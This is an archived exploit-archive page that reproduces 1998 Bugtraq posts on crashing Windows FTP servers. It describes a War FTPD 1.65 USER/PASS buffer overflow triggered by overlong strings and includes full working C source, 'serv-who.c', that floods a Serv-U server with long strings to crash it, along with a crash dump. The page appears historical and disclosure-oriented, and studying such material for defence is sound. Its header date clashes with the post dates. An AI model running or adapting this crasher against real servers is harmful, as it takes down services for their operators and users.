Many Windows FTP servers are not very robust

Summary

Description:	This is an example of how tocrash War FTPD 1.65 for Win 95/NT, you can do similar things with ServU and most other ftpd's I have seen.
Author:	Well known, but here is a post to Bugtraq from rootshell
Compromise:	crash the Windows ftpd
Vulnerable Systems:	Those runnign Windows ftp servers
Date:	4 February 1997
Notes:	I have appended a serv-U crasher. Note that this may be the fault of Windows and not Serv-U.

Details


Date: Wed, 4 Feb 1998 12:49:42 -0600
From: Aleph One <aleph1@DFW.DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95/NT War FTPD 1.65 Buffer Overflow

>From rootshell:

---------- Forwarded message ----------
Windows 95/NT War FTPD 1.65 Buffer Overflow
-------------------------------------------

The popular War FTPD daemon for Windows 95 and NT contains a very bad buffer
overflow allows for remote users to execute code on your stack or simply
crash the ftp server.

The overflow exists in many places including the USER and PASS phase.  To
exploit War FTPD you must connect to the FTP server (port 21) and issue the
following command :

USER xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (very long string)

or

PASS xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (very long strong)

At this point the FTP daemon will crash.  We at Rootshell are not Windows
users and did not have the resources or time to write actual code to execute
on the stack, however it IS possible.

You may find War FTPD information at http://www.sidenet.com.br/jgaa/
Date: Thu, 5 Feb 1998 01:01:59 -0500
From: whiz <whizpig@TIR.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95 Serv-U FTP bug

Hello,
After reading an earlier message, Windows 95/NT War FTPD 1.65 Buffer
Overflow, I thought I might play around with some other Windows ftp
servers.  One problem I found was in Serv-U FTP by Cat-Soft
<http://www.cat-soft.com>.  After you connect instead of sending the normal
USER then PASS, you can send garbage.  And if you send alot of garbage at a
high speed Serv-U will stop responding to mouse clicks and after a short
amount of time will crash and give you this:

SERV-U32 caused a stack fault in module KERNEL32.DLL at 014f:bff9a08c.
Registers:
EAX=005e2084 CS=014f EIP=bff9a08c EFLGS=00000246
EBX=17bf0514 SS=0157 ESP=005e2080 EBP=005e20d4
ECX=005e2098 DS=0157 ESI=81628c70 FS=2347
EDX=ffffffff ES=0157 EDI=0000ffff GS=0000
Bytes at CS:EIP:
5e 8b e5 5d c2 10 00 64 a1 00 00 00 00 55 8b ec
Stack dump:
00000001 c00000fd 00000000 00000000 bff9a08c 00000000 01570157 01870028
17bf0b6a c10fabe8 16c70001 80dc0014 16e73a45 00040000 02000000 bff97fdc

Why it does this I have no idea.  It only acts this way in the windows 95
version.  Under NT the cpu usage goes up to 100%, but no crash.  Alot of
times even after the crashed Serv-U has closed, Windows is still slow to
non responsive.

And here is the program I used, not pretty but it works:


/*


        serv-who.c - 1998 - whiz
        kills Serv-U ftp on win95 boxes

        This program makes SERV-U32 cause
        a stack fault in module KERNEL32.DLL
        Sometimes after Serv-U crashes, windows
        becomes slow and non responsive,
        just an added bonus.  Another thing
        is that if the ftp is running on NT
        it usually won't crash, just raise
        CPU usage to 100% while the attack is
        running.

        Tested on:
        i586/100 - 72 meg RAM - crashed 5 times - Serv-U FTP-Server v2.3a
        i586/300 - 32 meg RAM - crashed 2 times - Serv-U FTP-Server v2.3b
        ?/? - ? meg RAM - crashed 2 times - Serv-U FTP-Server v2.3
        i586/233 - 32 meg RAM - crashed 1 time - Serv-U FTP-Server v2.2

        >>> Thanks to gen for helping me test this. <<<

        Another thing that might effect this
        program is how fast the serv-who
        computer's internet connection is.
        Or in other words how much faster is
        it then the victim's link.  A Faster
        one will give a higher success rate.

        serv-who, like, who the hell are
        you going to serv now, your crashed


*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>


int x, s, i, p, dport;

char *str =
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
*
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("     Connected to [%s:%d].\n",server,port);
        return;
}


void main(int argc, char *argv[]) {
     int t;
     if (argc != 3) {
       printf("serv-who.c - whiz\n\n");
       printf("kills serv-u ftp daemons\n\n");
       printf("Usage: %s <victim> <port>\n",argv[0]);
       exit(0);
     }
     printf("serv-who.c - whiz\n\n");
     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }
     p = atoi(argv[2]);
     open_sock(s,argv[1],p);

     printf("     Sending crap to %s on port %i... \n", argv[1], p);
     for (i=0; i<1000; i++) {            /* loop is REAL high, most likely
*/
       send(s,str,strlen(str),0x0);      /* it will exit with a */
                         send(s,str,strlen(str)*20+1,0x0); /* "Broken Pipe"
error before */
       send(s,str,strlen(str)*25+2,0x0); /* finishing the loop */
       send(s,str,strlen(str)*30+3,0x0);
       send(s,str,strlen(str)*35+4,0x0);
       send(s,str,strlen(str)*40+5,0x0); /* i just went crazy on the sends */
       send(s,str,strlen(str)*45+4,0x0); /* pay no attention to them */
       send(s,str,strlen(str)*50+5,0x0);
       send(s,str,strlen(str)*255+4,0x0);
       send(s,str,strlen(str)*182+5,0x0);
       send(s,str,strlen(str)*888+4,0x0);
       send(s,str,strlen(str)*666+5,0x0);
       send(s,str,strlen(str)*20+1,0x0);
       send(s,str,strlen(str)*25+2,0x0);
       send(s,str,strlen(str)*30+3,0x0);
       send(s,str,strlen(str)*35+4,0x0);
       send(s,str,strlen(str)*40+5,0x0);
       send(s,str,strlen(str)*45+4,0x0);
       send(s,str,strlen(str)*50+5,0x0);
       send(s,str,strlen(str)*255+4,0x0);
       send(s,str,strlen(str)*182+5,0x0);
       send(s,str,strlen(str)*888+4,0x0);
       send(s,str,strlen(str)*666+5,0x0);
     }
     printf("all done\n");
     close(s);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: